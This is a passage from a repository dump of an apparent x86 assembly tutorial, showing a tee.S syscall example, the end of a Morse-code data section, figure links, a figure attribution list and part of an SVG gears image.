62 |   .ascii "-.--    ", "--..    "                         # Y, Z
63 | 
64 | .section .data
65 |   # Input Word Storage
66 |   inputWord: .ascii "HELLO\0"
67 | 
68 | .section .bss
69 |   # Output Morse Code Storage
70 |   .comm outputMorse, 64
71 | 
72 | 


--------------------------------------------------------------------------------
/examples/tee.S:
--------------------------------------------------------------------------------
 1 | # Tee (tee.S)
 2 | .section .text
 3 | .global _start
 4 | _start:
 5 |   push %ebp
 6 |   mov %esp, %ebp
 7 | 
 8 |   subl $4, %esp       # int fd; on the stack
 9 | 
10 |   cmpl $2, 4(%ebp)    # if (argc != 2)
11 |   jne tee_usage       #   goto tee_usage;
12 | 
13 |   tee_open:
14 |   # syscall open(argv[1], O_CREAT|O_WRONLY|O_TRUNC, 0644);
15 |   movl $0x05, %eax
16 |   movl 12(%ebp), %ebx
17 |   movl $0x241, %ecx
18 |   movl $0644, %edx
19 |   int $0x80
20 | 
21 |   cmpl $0, %eax       # if (%eax < 0)
22 |   jl tee_exit         #   goto tee_exit;
23 | 
24 |   movl %eax, -4(%ebp) # fd = %eax
25 | 
26 |   tee_loop:
27 |     # Read from input
28 |     # syscall read(0, &c, 1);
29 |     movl $3, %eax
30 |     movl $0, %ebx
31 |     movl $c, %ecx
32 |     movl $1, %edx
33 |     int $0x80
34 | 
35 |     cmpl $1, %eax       # if (%eax < 1)
36 |     jl tee_exit         #   goto tee_exit;
37 | 
38 |     # Write to file
39 |     # syscall write(fd, &c, 1);
40 |     movl $4, %eax
41 |     movl -4(%ebp), %ebx
42 |     movl $c, %ecx
43 |     movl $1, %edx
44 |     int $0x80
45 |     # Write to stdout
46 |     # syscall write(1, &c, 1);
47 |     movl $4, %eax
48 |     movl $1, %ebx
49 |     movl $c, %ecx
50 |     movl $1, %edx
51 |     int $0x80
52 | 
53 |     jmp tee_loop       # Loop
54 | 
55 |   tee_usage:
56 |   # syscall write(1, usageStr, usageStrLen);
57 |   movl $4, %eax
58 |   movl $1, %ebx
59 |   movl $usageStr, %ecx
60 |   movl $usageStrLen, %edx
61 |   int $0x80
62 | 
63 |   tee_exit:
64 |   # syscall exit(0);
65 |   movl $1, %eax
66 |   movl $0, %ebx
67 |   int $0x80
68 | 
69 | .section .rodata
70 |   # Usage string and length
71 |   usageStr:     .ascii "./tee <file>\n"
72 |   .equ usageStrLen, . - usageStr
73 | 
74 | .section .bss
75 |   # Read character var
76 |   .comm c, 1
77 | 
78 | 


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute0.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute1.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute2.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute3.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute4.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute5.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute6.png


--------------------------------------------------------------------------------
/figures/386fetch_decode_execute7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386fetch_decode_execute7.png


--------------------------------------------------------------------------------
/figures/386state.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386state.png


--------------------------------------------------------------------------------
/figures/386statemem.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/386statemem.png


--------------------------------------------------------------------------------
/figures/8086state.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/8086state.png


--------------------------------------------------------------------------------
/figures/BORROWED_FIGURES.txt:
--------------------------------------------------------------------------------
 1 | Image:          simd.png
 2 | Source:         http://software.intel.com/en-us/articles/introduction-to-intel-advanced-vector-extensions/
 3 | License:        Unknown
 4 | 
 5 | Image:          ia32-eflags.png
 6 | Source:         screenshot of "Intel 64 and IA-32 Architectures Software Developers Manual Vol. 1, A-1"
 7 | License:        Unknown
 8 | 
 9 | Image:          syscalls.png
10 | Source:         screenshot of http://syscalls.kernelgrok.com/
11 | License:        Unknown
12 | 
13 | Image:          gears.svg
14 | Source:         http://openclipart.org/detail/38827/netalloy-gears-by-netalloy
15 | License:        Probably Public Domain
16 | 
17 | Image:          hamster.jpg
18 | Source:         https://commons.wikimedia.org/wiki/File:Phodopus_sungorus_-_Hamsterkraftwerk.jpg by Mylius (https://commons.wikimedia.org/wiki/User:Mylius)
19 | License:        Creative Commons Attribution-Share Alike 3.0 Unported
20 | 
21 | Please contact me if you would like a figure removed from apfcp.
22 | 


--------------------------------------------------------------------------------
/figures/bufferoverflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/bufferoverflow.png


--------------------------------------------------------------------------------
/figures/cpustate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/cpustate.png


--------------------------------------------------------------------------------
/figures/eflags.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vsergeev/apfcp/a8077d9d63ef418a1c40a7a24c4755ead8f6eced/figures/eflags.png


--------------------------------------------------------------------------------
/figures/gears.svg:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
  2 | <!-- Created with Inkscape (http://www.inkscape.org/) -->
  3 | 
  4 | <svg
  5 |    xmlns:dc="http://purl.org/dc/elements/1.1/"
  6 |    xmlns:cc="http://creativecommons.org/ns#"
  7 |    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
  8 |    xmlns:svg="http://www.w3.org/2000/svg"
  9 |    xmlns="http://www.w3.org/2000/svg"
 10 |    xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
 11 |    xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
 12 |    width="64"
 13 |    height="64"
 14 |    id="svg6868"
 15 |    sodipodi:version="0.32"
 16 |    inkscape:version="0.47 r22583"
 17 |    version="1.0"
 18 |    sodipodi:docname="gears.svg"
 19 |    inkscape:output_extension="org.inkscape.output.svg.inkscape">
 20 |   <defs
 21 |      id="defs6870">
 22 |     <inkscape:perspective
 23 |        sodipodi:type="inkscape:persp3d"
 24 |        inkscape:vp_x="0 : 32 : 1"
 25 |        inkscape:vp_y="0 : 1000 : 0"
 26 |        inkscape:vp_z="64 : 32 : 1"
 27 |        inkscape:persp3d-origin="32 : 21.333333 : 1"
 28 |        id="perspective71" />
 29 |     <filter
 30 |        inkscape:collect="always"
 31 |        id="filter8141">
 32 |       <feGaussianBlur
 33 |          inkscape:collect="always"
 34 |          stdDeviation="0.9772817"
 35 |          id="feGaussianBlur8143" />
 36 |     </filter>
 37 |   </defs>
 38 |   <sodipodi:namedview
 39 |      id="base"
 40 |      pagecolor="#ffffff"
 41 |      bordercolor="#666666"
 42 |      borderopacity="1.0"
 43 |      gridtolerance="10000"
 44 |      guidetolerance="10"
 45 |      objecttolerance="10"
 46 |      inkscape:pageopacity="0.0"
 47 |      inkscape:pageshadow="2"
 48 |      inkscape:zoom="5.890625"
 49 |      inkscape:cx="32"
 50 |      inkscape:cy="33.733773"
 51 |      inkscape:document-units="px"
 52 |      inkscape:current-layer="layer1"
 53 |      width="64px"
 54 |      height="64px"
 55 |      inkscape:window-width="744"
 56 |      inkscape:window-height="573"
 57 |      inkscape:window-x="22"
 58 |      inkscape:window-y="29"
 59 |      showgrid="false"
 60 |      inkscape:window-maximized="0" />
 61 |   <metadata
 62 |      id="metadata6873">
 63 |     <rdf:RDF>
 64 |       <cc:Work
 65 |          rdf:about="">
 66 |         <dc:format>image/svg+xml</dc:format>
 67 |         <dc:type
 68 |            rdf:resource="http://purl.org/dc/dcmitype/StillImage" />
 69 |         <dc:title></dc:title>
 70 |       </cc:Work>
 71 |     </rdf:RDF>
 72 |   </metadata>
 73 |   <g
 74 |      inkscape:label="Layer 1"
 75 |      inkscape:groupmode="layer"
 76 |      id="layer1">
 77 |     <g
 78 |        id="g7010"
 79 |        style="opacity:0.42222222;filter:url(#filter8141)">
 80 |       <path
 81 |          d="M 40.403184 25.29443 A 10.694961 10.694961 0 1 1  19.013263,25.29443 A 10.694961 10.694961 0 1 1  40.403184 25.29443 z"
 82 |          sodipodi:ry="10.694961"
 83 |          sodipodi:rx="10.694961"
 84 |          sodipodi:cy="25.29443"
 85 |          sodipodi:cx="29.708223"
 86 |          id="path6876"
 87 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
 88 |          sodipodi:type="arc" />
 89 |       <path
 90 |          transform="translate(-1.1883289,-2.5464191)"
 91 |          d="M 36.159151 27.586206 A 5.0079575 5.0079575 0 1 1  26.143236,27.586206 A 5.0079575 5.0079575 0 1 1  36.159151 27.586206 z"
 92 |          sodipodi:ry="5.0079575"
 93 |          sodipodi:rx="5.0079575"
 94 |          sodipodi:cy="27.586206"
 95 |          sodipodi:cx="31.151194"
 96 |          id="path6880"
 97 |          style="opacity:1;fill:#f9f9f9;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
 98 |          sodipodi:type="arc" />
 99 |       <rect
100 |          y="11.204244"
101 |          x="28.180372"
102 |          height="4.2440319"
103 |          width="3.9045093"
104 |          id="rect6882"
105 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1" />
106 |       <rect
107 |          transform="scale(1,-1)"
108 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
109 |          id="rect6884"
110 |          width="3.9045093"
111 |          height="4.2440319"
112 |          x="28.180372"
113 |          y="-39.045094" />
114 |       <rect
115 |          transform="matrix(0,1,-1,0,0,0)"
116 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
117 |          id="rect6888"
118 |          width="3.9045093"
119 |          height="4.2440319"
120 |          x="23.766579"
121 |          y="-20.031832" />
122 |       <rect
123 |          y="-44.03183"
124 |          x="23.766579"
125 |          height="4.2440319"
126 |          width="3.9045093"
127 |          id="rect6890"
128 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
129 |          transform="matrix(0,1,-1,0,0,0)" />
130 |       <rect
131 |          y="-28.627947"
132 |          x="-3.5255826"
133 |          height="4.2440319"
134 |          width="3.9045093"
135 |          id="rect6892"
136 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
137 |          transform="matrix(-0.6746712,0.7381184,-0.7381184,-0.6746712,0,0)" />
138 |       <rect
139 |          transform="matrix(-0.6746712,0.7381184,-0.7381184,-0.6746712,0,0)"
140 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
141 |          id="rect6894"
142 |          width="3.9045093"
143 |          height="4.2440319"
144 |          x="-3.7298999"
145 |          y="-53.510315" />
146 |       <rect
147 |          y="11.695576"
148 |          x="-42.105541"
149 |          height="4.2440319"
150 |          width="3.9045093"
151 |          id="rect6946"
152 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
153 |          transform="matrix(-0.7381184,-0.6746712,0.6746712,-0.7381184,0,0)" />
154 |       <rect
155 |          transform="matrix(-0.7381184,-0.6746712,0.6746712,-0.7381184,0,0)"
156 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
157 |          id="rect6948"
158 |          width="3.9045093"
159 |          height="4.2440319"
160 |          x="-40.265862"
161 |          y="-13.215155" />
162 |       <path
163 |          transform="matrix(0.6112459,7.5194775e-2,-7.5194775e-2,0.6112459,25.577299,26.107116)"
164 |          sodipodi:type="arc"
165 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
166 |          id="path6950"
167 |          sodipodi:cx="29.708223"
168 |          sodipodi:cy="25.29443"
169 |          sodipodi:rx="10.694961"
170 |          sodipodi:ry="10.694961"
171 |          d="M 40.403184 25.29443 A 10.694961 10.694961 0 1 1  19.013263,25.29443 A 10.694961 10.694961 0 1 1  40.403184 25.29443 z" />
172 |       <path
173 |          sodipodi:type="arc"
174 |          style="opacity:1;fill:#f9f9f9;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
175 |          id="path6952"
176 |          sodipodi:cx="31.151194"
177 |          sodipodi:cy="27.586206"
178 |          sodipodi:rx="5.0079575"
179 |          sodipodi:ry="5.0079575"
180 |          d="M 36.159151 27.586206 A 5.0079575 5.0079575 0 1 1  26.143236,27.586206 A 5.0079575 5.0079575 0 1 1  36.159151 27.586206 z"
181 |          transform="matrix(0.6112459,7.5194775e-2,-7.5194775e-2,0.6112459,25.042415,24.461272)" />
182 |       <rect
183 |          transform="matrix(0.992518,0.1220984,-0.1220984,0.992518,0,0)"
184 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
185 |          id="rect6954"
186 |          width="2.4046063"
187 |          height="2.6137028"
188 |          x="45.928555"
189 |          y="29.689009" />
190 |       <rect
191 |          y="-46.8349"
192 |          x="45.928555"
193 |          height="2.6137028"
194 |          width="2.4046063"
195 |          id="rect6956"
196 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
197 |          transform="matrix(0.992518,0.1220984,0.1220984,-0.992518,0,0)" />
198 |       <rect
199 |          y="-40.910248"
200 |          x="37.425571"
201 |          height="2.6137028"
202 |          width="2.4046063"
203 |          id="rect6958"
204 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
205 |          transform="matrix(-0.1220984,0.992518,-0.992518,-0.1220984,0,0)" />
206 |       <rect
207 |          transform="matrix(-0.1220984,0.992518,-0.992518,-0.1220984,0,0)"
208 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
209 |          id="rect6960"
210 |          width="2.4046063"
211 |          height="2.6137028"
212 |          x="37.425571"
213 |          y="-55.690735" />
214 |       <rect
215 |          transform="matrix(-0.7597464,0.6502195,-0.6502195,-0.7597464,0,0)"
216 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
217 |          id="rect6962"
218 |          width="2.4046063"
219 |          height="2.6137028"
220 |          x="-4.6281481"
221 |          y="-54.096272" />
222 |       <rect
223 |          y="-69.420166"
224 |          x="-4.7539773"
225 |          height="2.6137028"
226 |          width="2.4046063"
227 |          id="rect6964"
228 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
229 |          transform="matrix(-0.7597464,0.6502195,-0.6502195,-0.7597464,0,0)" />
230 |       <rect
231 |          transform="matrix(-0.6502195,-0.7597464,0.7597464,-0.6502195,0,0)"
232 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
233 |          id="rect6966"
234 |          width="2.4046063"
235 |          height="2.6137028"
236 |          x="-62.396496"
237 |          y="9.659668" />
238 |       <rect
239 |          y="-5.6816974"
240 |          x="-61.263523"
241 |          height="2.6137028"
242 |          width="2.4046063"
243 |          id="rect6968"
244 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
245 |          transform="matrix(-0.6502195,-0.7597464,0.7597464,-0.6502195,0,0)" />
246 |       <path
247 |          d="M 40.403184 25.29443 A 10.694961 10.694961 0 1 1  19.013263,25.29443 A 10.694961 10.694961 0 1 1  40.403184 25.29443 z"
248 |          sodipodi:ry="10.694961"
249 |          sodipodi:rx="10.694961"
250 |          sodipodi:cy="25.29443"
251 |          sodipodi:cx="29.708223"
252 |          id="path6990"
253 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
254 |          sodipodi:type="arc"
255 |          transform="matrix(0.7132984,0.3256087,-0.3256087,0.7132984,7.0491312,18.79887)" />
256 |       <path
257 |          transform="matrix(0.7132984,0.3256087,-0.3256087,0.7132984,7.0306342,16.595584)"
258 |          d="M 36.159151 27.586206 A 5.0079575 5.0079575 0 1 1  26.143236,27.586206 A 5.0079575 5.0079575 0 1 1  36.159151 27.586206 z"
259 |          sodipodi:ry="5.0079575"
260 |          sodipodi:rx="5.0079575"
261 |          sodipodi:cy="27.586206"
262 |          sodipodi:cx="31.151194"
263 |          id="path6992"
264 |          style="opacity:1;fill:#f9f9f9;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
265 |          sodipodi:type="arc" />
266 |       <rect
267 |          y="22.650513"
268 |          x="36.174374"
269 |          height="3.3277531"
270 |          width="3.0615325"
271 |          id="rect6994"
272 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
273 |          transform="matrix(0.9097013,0.4152632,-0.4152632,0.9097013,0,0)" />
274 |       <rect
275 |          transform="matrix(0.9097013,0.4152632,0.4152632,-0.9097013,0,0)"
276 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
277 |          id="rect6996"
278 |          width="3.0615325"
279 |          height="3.3277531"
280 |          x="35.922562"
281 |          y="-45.155357" />
282 |       <rect
283 |          transform="matrix(-0.4152632,0.9097013,-0.9097013,-0.4152632,0,0)"
284 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
285 |          id="rect6998"
286 |          width="3.0615325"
287 |          height="3.3277531"
288 |          x="32.809532"
289 |          y="-29.926081" />
290 |       <rect
291 |          y="-48.744522"
292 |          x="32.809532"
293 |          height="3.3277531"
294 |          width="3.0615325"
295 |          id="rect7000"
296 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
297 |          transform="matrix(-0.4152632,0.9097013,-0.9097013,-0.4152632,0,0)" />
298 |       <rect
299 |          y="-42.728115"
300 |          x="-1.9852462"
301 |          height="3.3277533"
302 |          width="3.0615327"
303 |          id="rect7002"
304 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
305 |          transform="matrix(-0.9202627,0.3913012,-0.3913012,-0.9202627,0,0)" />
306 |       <rect
307 |          transform="matrix(-0.9202627,0.3913012,-0.3913012,-0.9202627,0,0)"
308 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
309 |          id="rect7004"
310 |          width="3.0615327"
311 |          height="3.3277533"
312 |          x="-1.7432038"
313 |          y="-61.882915" />
314 |       <rect
315 |          y="8.3015547"
316 |          x="-53.073265"
317 |          height="3.3277533"
318 |          width="3.0615327"
319 |          id="rect7006"
320 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
321 |          transform="matrix(-0.3913012,-0.9202627,0.9202627,-0.3913012,0,0)" />
322 |       <rect
323 |          transform="matrix(-0.3913012,-0.9202627,0.9202627,-0.3913012,0,0)"
324 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
325 |          id="rect7008"
326 |          width="3.0615327"
327 |          height="3.3277533"
328 |          x="-52.544754"
329 |          y="-11.250683" />
330 |     </g>
331 |     <g
332 |        id="g7042"
333 |        transform="translate(1.1883283,0.1697613)">
334 |       <path
335 |          sodipodi:type="arc"
336 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
337 |          id="path7044"
338 |          sodipodi:cx="29.708223"
339 |          sodipodi:cy="25.29443"
340 |          sodipodi:rx="10.694961"
341 |          sodipodi:ry="10.694961"
342 |          d="m 40.403184,25.29443 c 0,5.906663 -4.788297,10.69496 -10.694961,10.69496 -5.906663,0 -10.69496,-4.788297 -10.69496,-10.69496 0,-5.906664 4.788297,-10.694961 10.69496,-10.694961 5.906664,0 10.694961,4.788297 10.694961,10.694961 z" />
343 |       <path
344 |          sodipodi:type="arc"
345 |          style="opacity:1;fill:#f9f9f9;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
346 |          id="path7046"
347 |          sodipodi:cx="31.151194"
348 |          sodipodi:cy="27.586206"
349 |          sodipodi:rx="5.0079575"
350 |          sodipodi:ry="5.0079575"
351 |          d="m 36.159151,27.586206 c 0,2.765819 -2.242139,5.007958 -5.007957,5.007958 -2.765819,0 -5.007958,-2.242139 -5.007958,-5.007958 0,-2.765818 2.242139,-5.007957 5.007958,-5.007957 2.765818,0 5.007957,2.242139 5.007957,5.007957 z"
352 |          transform="translate(-1.1883289,-2.5464191)" />
353 |       <rect
354 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
355 |          id="rect7048"
356 |          width="3.9045093"
357 |          height="4.2440319"
358 |          x="28.180372"
359 |          y="11.204244" />
360 |       <rect
361 |          y="-39.045094"
362 |          x="28.180372"
363 |          height="4.2440319"
364 |          width="3.9045093"
365 |          id="rect7050"
366 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
367 |          transform="scale(1,-1)" />
368 |       <rect
369 |          y="-20.031832"
370 |          x="23.766579"
371 |          height="4.2440319"
372 |          width="3.9045093"
373 |          id="rect7052"
374 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
375 |          transform="matrix(0,1,-1,0,0,0)" />
376 |       <rect
377 |          transform="matrix(0,1,-1,0,0,0)"
378 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
379 |          id="rect7054"
380 |          width="3.9045093"
381 |          height="4.2440319"
382 |          x="23.766579"
383 |          y="-44.03183" />
384 |       <rect
385 |          transform="matrix(-0.6746712,0.7381184,-0.7381184,-0.6746712,0,0)"
386 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
387 |          id="rect7056"
388 |          width="3.9045093"
389 |          height="4.2440319"
390 |          x="-3.5255826"
391 |          y="-28.627947" />
392 |       <rect
393 |          y="-53.510315"
394 |          x="-3.7298999"
395 |          height="4.2440319"
396 |          width="3.9045093"
397 |          id="rect7058"
398 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
399 |          transform="matrix(-0.6746712,0.7381184,-0.7381184,-0.6746712,0,0)" />
400 |       <rect
401 |          transform="matrix(-0.7381184,-0.6746712,0.6746712,-0.7381184,0,0)"
402 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
403 |          id="rect7060"
404 |          width="3.9045093"
405 |          height="4.2440319"
406 |          x="-42.105541"
407 |          y="11.695576" />
408 |       <rect
409 |          y="-13.215155"
410 |          x="-40.265862"
411 |          height="4.2440319"
412 |          width="3.9045093"
413 |          id="rect7062"
414 |          style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#fdfdfd;stroke-width:0;stroke-linejoin:round;stroke-miterlimit:4;stroke-dasharray:none;stroke-dashoffset:0;stroke-opacity:1"
415 |          transform="matrix(-0.7381184,-0.6746712,0.6746712,-0.7381184,0,0)" />
416 |       <path
